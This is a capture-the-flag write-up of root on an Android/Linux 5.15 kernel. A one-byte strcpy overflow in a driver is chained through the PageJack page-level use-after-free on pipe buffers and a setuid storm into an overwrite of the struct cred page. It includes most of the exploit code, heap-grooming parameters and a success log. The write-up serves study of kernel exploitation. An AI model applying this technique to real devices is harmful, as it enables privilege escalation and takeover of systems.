TL;DR
A one-byte off-by-one NUL in an Android kernel driver is leveraged into a
page-level UAF and then into root via a struct cred overwrite (PageJack). No
infoleak, no kernel address. Validated on the local QEMU image and ported to a
Corellium device.
Target : Linux 5.15.41 arm64, /dev/kern-net
Local : QEMU, nokaslr, uid mhl=1000
Device : Corellium (Android ranchu), KASLR on, SELinux enforcing, uid shell=2000
Flag : MHL{big_things_have_small_beginnings}
Vulnerability
The driver’s LOAD_MODEL_DATA ioctl copies a fixed 128-byte structure from
userland into a kernel buffer, then strcpys the description field:
struct model_metadata { // sizeof == 128
uint32_t framework_type; // 0x00
uint16_t model_version; // 0x04
uint16_t precision_bits; // 0x06
uint32_t input_shape[3]; // 0x08
uint32_t output_size; // 0x14
uint64_t weight_checksum; // 0x18
char model_desc[96]; // 0x20 .. 0x80
};
mdata = kmalloc(128, GFP_KERNEL_ACCOUNT); // -> kmalloc-cg-128
strcpy(mdata->model_desc, user->model_desc);
model_desc is 96 bytes and ends exactly at offset 128. Supplying 96 non-NUL
characters makes strcpy write those 96 bytes plus a terminating \0 at offset
128: a single NUL at the first byte past the object, which is byte 0 of the next
cg-128 slot. The _ACCOUNT flag routes the allocation into the accounted
kmalloc-cg-* caches.
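The arithmetic can be checked in userland. The sketch below is an illustration only, not driver code: it models two adjacent 128-byte slots as one flat 256-byte array, and the names SLOT_SIZE, DESC_OFF, DESC_LEN and simulate_off_by_one are hypothetical.

```c
#include <stddef.h>
#include <string.h>

#define SLOT_SIZE 128   /* sizeof(struct model_metadata) */
#define DESC_OFF  0x20  /* offset of model_desc inside the struct */
#define DESC_LEN  96    /* sizeof(model_desc) */

/* Models two adjacent slots of one slab page as a flat array:
 * slot 0 is the mdata object, slot 1 is its neighbour.
 * Returns the array offset at which strcpy wrote its terminator. */
size_t simulate_off_by_one(unsigned char slab[2 * SLOT_SIZE])
{
    char desc[DESC_LEN + 1];

    memset(desc, 'A', DESC_LEN);   /* 96 non-NUL characters */
    desc[DESC_LEN] = '\0';

    /* Same call shape as the driver: the copy is bounded only by the NUL. */
    strcpy((char *)slab + DESC_OFF, desc);

    return DESC_OFF + strlen(desc); /* 0x20 + 96 = 128 */
}
```

Filling the array with a non-zero pattern beforehand makes the effect visible: byte 127 becomes 'A', byte 128 (byte 0 of the neighbour) becomes 0x00, and byte 129 is untouched.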
Relevant kernel configuration:
- SLAB_FREELIST_RANDOM and SLAB_FREELIST_HARDENED enabled (randomized object order, obfuscated freelist pointers).
- VMAP_STACK enabled (kernel stacks are vmalloc’d).
- INIT_ON_ALLOC / INIT_ON_FREE disabled.
- KASLR enabled but irrelevant: the exploit needs no infoleak.
- System V IPC disabled on Android (msgget returns ENOSYS), which rules out the classic msg_msg route.
The single NUL at offset 0 of a neighbour is too weak to corrupt a msg_msg
usefully inside cg-128, so we target a page instead of an object.
Target object: cross-page onto a pipe_buffer array
A resized pipe is backed by an array of pipe_buffer structs:
struct pipe_buffer { // sizeof = 40 B
struct page *page; // offset 0
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
After F_SETPIPE_SZ(2*PAGE) the array is 2 * 40 = 80 bytes and lands in
kmalloc-cg-96. Separately, the full-page write into each pipe allocates a
dedicated 4 KiB data page (alloc_page, unmovable), and pipe_buffer[0].page
holds the only reference to it.
A cg-128 slab page holds 4096 / 128 = 32 objects. The off-by-one NUL lands at
offset +128 of the mdata object, i.e. byte 0 of the next object. For objects
0..30 that next object is in the same page (same cache, useless). For object 31
(offset 0xf80), model_desc ends at 0xf80 + 0x20 + 96 = 0x1000, byte 0 of the
neighbouring page. A slab page belongs to a single cache, but two pages of
different caches can be physically adjacent: the buddy allocator can place a
cg-128 page right before a cg-96 page. We therefore groom so that a cg-128
page whose mdata is the last object is physically followed by a pipe_buffer
array page. The NUL then hits byte 0 of that page, the LSB of
pipe_buffer[0].page.
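The slot geometry above reduces to a few lines of arithmetic. This is a minimal sketch under the stated sizes (4 KiB page, 128-byte objects); the helper names nul_offset, nul_crosses_page and crossing_slots are hypothetical.

```c
#include <stdbool.h>

#define PG        4096u  /* order-0 slab page */
#define OBJ_SIZE  128u   /* kmalloc-cg-128 object size */

/* Page offset at which the stray NUL lands for the object in slot idx.
 * A result of PG means byte 0 of the physically following page. */
unsigned nul_offset(unsigned idx)
{
    return idx * OBJ_SIZE + OBJ_SIZE; /* first byte after the object */
}

/* True only when the NUL leaves the slab page. */
bool nul_crosses_page(unsigned idx)
{
    return nul_offset(idx) >= PG;
}

/* Number of slots (out of PG / OBJ_SIZE) whose overflow crosses the page. */
unsigned crossing_slots(void)
{
    unsigned count = 0;

    for (unsigned idx = 0; idx < PG / OBJ_SIZE; idx++)
        if (nul_crosses_page(idx))
            count++;
    return count;
}
```

Only one slot in 32 qualifies, so a single poison attempt is unlikely to be the useful one. That is consistent with poisoning in batches and checking for an overlap after each batch.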


PageJack primitive
The kernel keeps a struct page descriptor for every physical page in a flat
array (vmemmap):
PFN N -> vmemmap[N] @ vmemmap_base + N * 0x40
Since sizeof(struct page) == 0x40, every valid struct page * has one of
{0x00, 0x40, 0x80, 0xC0} as its low byte. Clearing that low byte to 0x00
(ptr &= ~0xff) rounds the pointer down to a 0x100 boundary, i.e. pfn &= ~3:
| original LSB | net shift | target |
|---|---|---|
| 0x00 | 0 | no-op |
| 0x40 | -0x40 | PFN - 1 |
| 0x80 | -0x80 | PFN - 2 |
| 0xC0 | -0xC0 | PFN - 3 |
In three cases out of four, pipe_buffer.page is shifted onto a different
struct page, describing a different physical page. With a dense pipe spray those
pages tend to have consecutive PFNs, so the shifted pointer lands on a
neighbouring pipe’s data page. Two pipes (call them C and V) now reference the
same page P, and P’s refcount is still 1: the NUL rewrote a pointer, it never
called get_page.
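The pointer shift can be modelled without any kernel address. In the sketch below VMEMMAP_BASE is a made-up, 0x100-aligned value chosen only for illustration (the exploit never needs the real one), and the helper names are hypothetical. It assumes a little-endian layout, so byte 0 of the stored pointer is its least significant byte.

```c
#include <stdint.h>

#define STRUCT_PAGE_SIZE 0x40u
/* Hypothetical base, for illustration only; any 0x100-aligned value works. */
#define VMEMMAP_BASE 0xfffffc0000000000ull

/* Address of the struct page describing a given PFN. */
uint64_t page_of_pfn(uint64_t pfn)
{
    return VMEMMAP_BASE + pfn * STRUCT_PAGE_SIZE;
}

/* Inverse mapping: PFN described by a struct page address. */
uint64_t pfn_of_page(uint64_t page)
{
    return (page - VMEMMAP_BASE) / STRUCT_PAGE_SIZE;
}

/* Effect of the stray NUL on the stored pointer: the low byte is cleared. */
uint64_t poison_lsb(uint64_t page)
{
    return page & ~(uint64_t)0xff;
}

/* How many PFNs the poisoned pointer moved back (0..3). */
unsigned pfn_shift(uint64_t pfn)
{
    return (unsigned)(pfn - pfn_of_page(poison_lsb(page_of_pfn(pfn))));
}
```

For any PFN the shift equals pfn & 3, which matches the four rows of the table: only PFNs that are already a multiple of 4 are left unchanged.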

The pipe write primitive
Each pipe is given a full-page marker: a 4 KiB write where every 4-byte word is
the pipe index. Reading a pipe returns the marker of whatever page its
pipe_buffer[0].page currently points at, which makes the overlap detectable
entirely in userland.
To write into the dangling page later, the exploit uses tmp_page. When a pipe
buffer is fully drained, anon_pipe_buf_release caches its page into
pipe->tmp_page if page_count(page) == 1 (true for a slab page) instead of
freeing it. The next write() reuses tmp_page as a fresh buffer at offset 0 and
copies into the page. Note that the overlap detection (Step 3) reads 4 bytes from
pipe C, leaving its buffer at offset = 4: the read view is therefore shifted by
4 bytes from the physical page, while the tmp_page write restarts at physical
offset 0, exactly where the slab objects begin (0, 192, 384, …).
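The marker and the 4-byte skew can be observed on an ordinary pipe. The sketch below is a userland illustration with a hypothetical helper name (marker_roundtrip). It writes one marked page, reads one word as the detection pass does, then drains the rest to show that only PG - 4 bytes remain in the read view.

```c
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>

#define PG 4096

/* Writes a full-page marker (every 32-bit word == idx, idx >= 0) into a
 * fresh pipe and reads one word back. Stores in *rest the number of bytes
 * still readable afterwards. Returns the word read, or -1 on failure. */
int marker_roundtrip(int idx, size_t *rest)
{
    int fds[2];
    int32_t v = -1;
    ssize_t r;
    int32_t *pg = malloc(PG);

    *rest = 0;
    if (pg == NULL)
        return -1;
    if (pipe(fds) != 0) {
        free(pg);
        return -1;
    }
    for (int k = 0; k < PG / 4; k++)
        pg[k] = idx;                       /* marker = pipe index */

    if (write(fds[1], pg, PG) != PG ||
        read(fds[0], &v, sizeof v) != (ssize_t)sizeof v)
        v = -1;

    close(fds[1]);                         /* lets the drain end on EOF */
    while ((r = read(fds[0], pg, PG)) > 0)
        *rest += (size_t)r;

    close(fds[0]);
    free(pg);
    return v;
}
```

On an uncorrupted pipe the returned word is always idx. A different value is the overlap signal, and the 4092 remaining bytes correspond to physical offsets 4 through PG - 1 of the page.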
cred_jar and the buddy allocator
struct cred is allocated from a dedicated cred_jar cache. Slab caches are
isolated at the slab layer but share the same buddy allocator, so a page returned
to buddy by a cg-* cache can be reissued to cred_jar on its next refill.
struct cred on Linux 5.15 arm64 (offsets verified through the gdb stub):
0x00 atomic_t usage (4 bytes, NOT atomic_long here)
0x04 kuid_t uid
0x08 kgid_t gid
0x0c suid 0x10 sgid
0x14 euid 0x18 egid
0x1c fsuid 0x20 fsgid
0x24 securebits
0x28 cap_inheritable 0x30 cap_permitted
0x38 cap_effective 0x40 cap_bset 0x48 cap_ambient
cred_jar geometry: order-0, object size 192, so a 4 KiB page hosts 21 cred
slots, with cpu_partial = 30, min_partial = 5.
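The layout and the slot count can be pinned down with compile-time checks. The struct below is a hypothetical userland mirror of the fields listed above (cred_view is not a kernel type), and the 192-byte stride is the object size quoted in the text.

```c
#include <stddef.h>
#include <stdint.h>

/* Userland mirror of the leading fields of struct cred as listed above
 * (Linux 5.15 arm64). Illustration only, not a kernel header. */
struct cred_view {
    int32_t  usage;                                   /* 0x00 */
    uint32_t uid, gid, suid, sgid;                    /* 0x04 .. 0x10 */
    uint32_t euid, egid, fsuid, fsgid;                /* 0x14 .. 0x20 */
    uint32_t securebits;                              /* 0x24 */
    uint64_t cap_inheritable, cap_permitted;          /* 0x28, 0x30 */
    uint64_t cap_effective, cap_bset, cap_ambient;    /* 0x38, 0x40, 0x48 */
};

_Static_assert(offsetof(struct cred_view, uid) == 0x04, "uid offset");
_Static_assert(offsetof(struct cred_view, fsgid) == 0x20, "fsgid offset");
_Static_assert(offsetof(struct cred_view, cap_inheritable) == 0x28, "caps start");
_Static_assert(offsetof(struct cred_view, cap_ambient) == 0x48, "cap_ambient offset");

#define PG        4096u
#define CRED_SLOT 192u   /* cred_jar object size quoted above */

/* Whole cred slots that fit in one order-0 slab page. */
unsigned creds_per_page(void)
{
    return PG / CRED_SLOT;
}

/* uid..fsgid are 8 id words per cred. */
unsigned id_words_per_page(void)
{
    return creds_per_page() * 8;
}
```

With these numbers a full cred page holds 21 objects and 168 id words, which gives a simple signature to look for when reading a reclaimed page back.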
Important Android detail: setting uid 0 is not enough. Without CAP_DAC_OVERRIDE
in cap_effective, opening the root-owned flag returns EACCES. The overwrite must
also fill the capability sets.
Reclaiming the page: the setuid storm
The textbook reclaim (a setuid loop to drain the freelist, then fork) is
unreliable on this target, for two measured reasons:
- cred_jar keeps a reservoir (cpu_partial = 30, min_partial = 5), so a cred allocation almost always finds a free slot and does not force a fresh slab onto P. /proc/slabinfo cannot observe the per-cpu freelist, so the drain target is not observable.
- fork/clone does not help: besides the cred it performs zero-filled order-0 allocations (COW page tables for fork, faulted stack pages for clone) that consume the pcp-hot page P and zero it. Combined with the reservoir, the cred lands in a free slot elsewhere while P is taken by one of those zeroing allocations. Waking workers by writing into a pipe fails for the same reason: the write allocates a pipe data page that grabs P.
The fix is a storm of pure cred allocations with no parasitic allocation in the post-free window:
- fork 256 helpers before the spray, so they do not inherit the spray pipe fds (their stacks and page tables are allocated well before the UAF). Each helper pins to CPU 0 and blocks on a control pipe.
- After close(V), wake them by closing the control pipe’s write end. The blocked read returns EOF, which allocates nothing.
- Each helper calls setuid(getuid()). That is prepare_creds, a pure cred allocation with no preceding stack or page-table allocation. In volume the storm crosses the slab boundary, a fresh slab is born on P, and fills with live creds. We observe P full: 21 cred objects, 8 id fields each = 168 words equal to our uid.
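The helper pattern described in this list can be sketched in isolation. This is a minimal userland sketch, not the exploit's own code: run_storm is a hypothetical name, CPU pinning is omitted for portability, and the helpers exit right after the setuid call instead of waiting for a second wake-up.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pre-forks nhelpers children blocked on a control pipe, wakes them all
 * with a single EOF, and lets each call setuid(getuid()).
 * Returns how many helpers completed the call, or -1 on error. */
int run_storm(int nhelpers)
{
    int ctl[2];
    int forked = 0, ok = 0;

    if (pipe(ctl) != 0)
        return -1;

    for (int i = 0; i < nhelpers; i++) {
        pid_t pid = fork();
        if (pid < 0)
            break;
        if (pid == 0) {
            char c;
            close(ctl[1]);                  /* or EOF would never arrive */
            while (read(ctl[0], &c, 1) > 0) /* block until the write end closes */
                ;
            /* The cred allocation happens here, after the wake-up. */
            _exit(setuid(getuid()) == 0 ? 0 : 1);
        }
        forked++;
    }

    close(ctl[0]);
    close(ctl[1]);                          /* wake: no write, only EOF */

    for (int i = 0; i < forked; i++) {
        int st;
        if (wait(&st) > 0 && WIFEXITED(st) && WEXITSTATUS(st) == 0)
            ok++;
    }
    return ok;
}
```

Each child closes its inherited copy of the write end, so the parent's close is the last one and delivers EOF to every helper at once.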

Exploitation
The exploit is a chain of small functions:
int main(void) {
setup(); // open device, pipes, rlimit, shared claim flag
fork_helpers(); // 256 setuid helpers, BEFORE the spray
pin_cpu0();
int n = spray_pipes(); // pipe_buffer arrays + a marked page each
punch_holes(n); // free every other pipe
int C, V;
if (!pagejack(n, &C, &V)) return 1; // poison until an alias is found
page_uaf(V); // close(V): put_page(P) 1 -> 0
char *page = calloc(1, PG);
int hit = reclaim_cred_jar(C, page); // setuid storm, then read P back
if (!hit) { pause(); return 1; }
overwrite_creds(C, page); // patch every cred on P (uid 0 + caps)
win(); // wake helpers; a rooted one prints the flag
pause(); // never close pipe C (no double put_page on P)
}
setup() raises RLIMIT_NOFILE (each pipe uses two fds) and pin_cpu0() pins to
CPU 0 (per-cpu slab/pcp locality). The rest is detailed below.
Step 1: spray_pipes() (pipe arrays + full-page markers)
for (n = 0; n < 4096; n++) {
pipe(pp[n]);
fcntl(pp[n][1], F_SETPIPE_SZ, 2*PG);
for (k = 0; k < PG/4; k++) ((int*)pg)[k] = n; // marker = index
write(pp[n][1], pg, PG);
}
Step 2: punch_holes() (checkerboard)
for (i = 0; i < n; i += 2) { close(pp[i][0]); close(pp[i][1]); pp[i][0] = -1; }
Freeing one in two keeps every freed page bordered by survivors, so an mdata
landing at the end of its slab page overflows into a pipe_buffer page.
Step 3: pagejack() (poison and locate the overlap)
while (np < 3072 && C < 0) {
for (i = 0; i < 128; i++) knet_poison(); // mdata, NUL at +128
np += 128;
for (i = 1; i < n; i += 2) { // userland detection
int v = -1;
if (read(pp[i][0], &v, 4) == 4 && v != i && v >= 0 && v < n && (v & 1) && pp[v][0] >= 0) { // bounds-check v before indexing pp[]
C = i; V = v; break; // C reads V's marker
}
}
}
C is the corrupted pipe (its .page was shifted onto V’s page P); V is the
legitimate owner. The partial read leaves the buffer alive, so P is not released.
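The detection rule can be isolated from the pipe I/O. In the sketch below, markers[i] stands for the word read from pipe i. The function name find_alias and the array representation are hypothetical, and it assumes, as in the checkerboard, that only odd indices survive.

```c
#include <stdbool.h>

/* markers[i] is the 32-bit word read from surviving pipe i (odd i only;
 * even entries are ignored because those pipes were closed).
 * On success stores the corrupted pipe in *C and the page owner in *V. */
bool find_alias(const int *markers, int n, int *C, int *V)
{
    for (int i = 1; i < n; i += 2) {
        int v = markers[i];

        if (v == i)
            continue;               /* pipe still sees its own page */
        if (v < 0 || v >= n)
            continue;               /* not a marker from our spray */
        if (!(v & 1))
            continue;               /* even pipes were freed: no live owner */
        *C = i;
        *V = v;
        return true;
    }
    return false;
}
```

A marker that is out of range or belongs to a freed pipe is skipped rather than trusted, since the shifted pointer may also land on a page that no surviving pipe owns.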
Step 4: page_uaf() (free the shared page)
close(pp[V][0]); close(pp[V][1]); // put_page(P): refcount 1 -> 0
P returns to buddy while pipe C still points at it: page-level UAF.
Step 5: reclaim_cred_jar() (the setuid storm)
close(ctl[1]); // EOF wakes the 256 pre-forked helpers
usleep(150*1000); // each helper: setuid(getuid()) -> fresh cred_jar slab on P
Step 6: overwrite_creds() (read P and overwrite every cred)
while ((r = read(pp[C][0], t+pos, PG-pos)) > 0) pos += r; // drain -> tmp_page=P
// rebuild the page (preserve each cred's kernel pointers), patch every cred:
for (m = 4; m < PG; m++) wb[m] = t[m-4]; // read view is +4
for (base = 0; base+176 <= PG; base += 192) {
*(int*)(wb+base) = 0x4000; // usage (large, never 0)
memset(wb+base+0x04, 0, 0x20); // uid..fsgid = 0
memset(wb+base+0x28, 0xff, 0x20); // caps inherit/perm/eff/bset = full
}
write(pp[C][1], wb, PG); // tmp_page == P -> rewrite the page
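The rebuild-and-patch step works on plain buffers, so it can be exercised without a kernel. The sketch below restates it as a function, using the offsets and the 192-byte stride given earlier. The name build_patched_page and the constants CRED_SIZE and READ_SKEW are hypothetical labels for the 176 and 4 that appear in the loop.

```c
#include <stdint.h>
#include <string.h>

#define PG        4096
#define CRED_SLOT 192   /* cred_jar object stride */
#define CRED_SIZE 176   /* per-object bound used by the patch loop */
#define READ_SKEW 4     /* bytes consumed earlier by the detection read */

/* view: the PG - READ_SKEW bytes drained from pipe C (physical 4..PG-1).
 * wb:   PG-byte output page, to be written back at physical offset 0.
 * Returns the number of cred slots patched. */
int build_patched_page(unsigned char *wb, const unsigned char *view)
{
    int patched = 0;

    memset(wb, 0, READ_SKEW);                     /* bytes 0..3 were never read */
    memcpy(wb + READ_SKEW, view, PG - READ_SKEW); /* undo the +4 read view */

    for (int base = 0; base + CRED_SIZE <= PG; base += CRED_SLOT) {
        int32_t usage = 0x4000;                   /* large, never reaches 0 */

        memcpy(wb + base, &usage, sizeof usage);
        memset(wb + base + 0x04, 0x00, 0x20);     /* uid..fsgid = 0 */
        memset(wb + base + 0x28, 0xff, 0x20);     /* inheritable..bset = full */
        patched++;
    }
    return patched;
}
```

Everything outside the patched ranges (securebits at 0x24, cap_ambient at 0x48 and the kernel pointers that follow) is copied through unchanged, which is what keeps the live creds usable after the write.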

Step 7: win() (read the flag once)
close(ctl2[1]); // second EOF: any helper whose live cred is on P is now root
Each rooted helper (uid 0 + full caps) can open /data/vendor/secret/flag.txt,
but only the first one reports: it claims a shared flag with
__sync_bool_compare_and_swap(claimed, 0, 1) and writes the flag back to the
parent through a result pipe, so the flag is printed exactly once. The parent must
not exit: closing pipe C would call put_page on a page now owned by cred_jar
and oops the kernel.
[+] /dev/kern-net opened
[+] 256 setuid helpers pre-forked
[+] sprayed 4096 pipes
[+] checkerboard holes punched
[+] PageJack: pipe 3879 aliases pipe 3877's page P
[+] page UAF: P freed, pipe C dangling
[+] cred_jar reclaim: P is a cred page (168 uid fields)
[+] every cred on P overwritten (uid 0 + full caps)
[+] ROOT FLAG = MHL{big_things_have_small_beginnings}
Tuning rationale
| Parameter | Value | Reason |
|---|---|---|
| model_desc | 96 ‘A’ | Forces strcpy to write the NUL at offset 128, byte 0 of the neighbour. |
| Vulnerable slot | last of its page | Only object 31 sends the NUL across the page boundary into a different cache. |
| Free step | 1 in 2 | Keeps freed pages bordered by survivors so overflows hit a pipe_buffer. |
| OOB byte | 0x00 | Keeps struct page * aligned to 0x40; pfn &= ~3 lands on a neighbour. |
| Helpers | 256, pre-forked | Pure setuid cred allocations with no zeroing alloc to steal P. |
| Wake | close (EOF) | Writing to a pipe would allocate a page that grabs P. |
| usage | 0x4000 | Large and non-zero, so the patched cred is never freed. |
| Overwrite | whole page + caps | Patches all 21 creds (any may be live) and adds CAP_DAC_OVERRIDE. |
| Closing pipe C | never | Releasing it would put_page a cred_jar page. |
References
- PageJack, Black Hat USA 2024 by Qian: page-level UAF technique.
- Reviving exploits against cred_struct, willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
- LACTF 2025 “messenger” writeup (same PageJack + cred_jar technique on a 3-byte OOB), kiperz.dev.
- corCTF 2025 “corphone” (Android pipe page-UAF to PTE hijack / SELinux off), u1f383.github.io.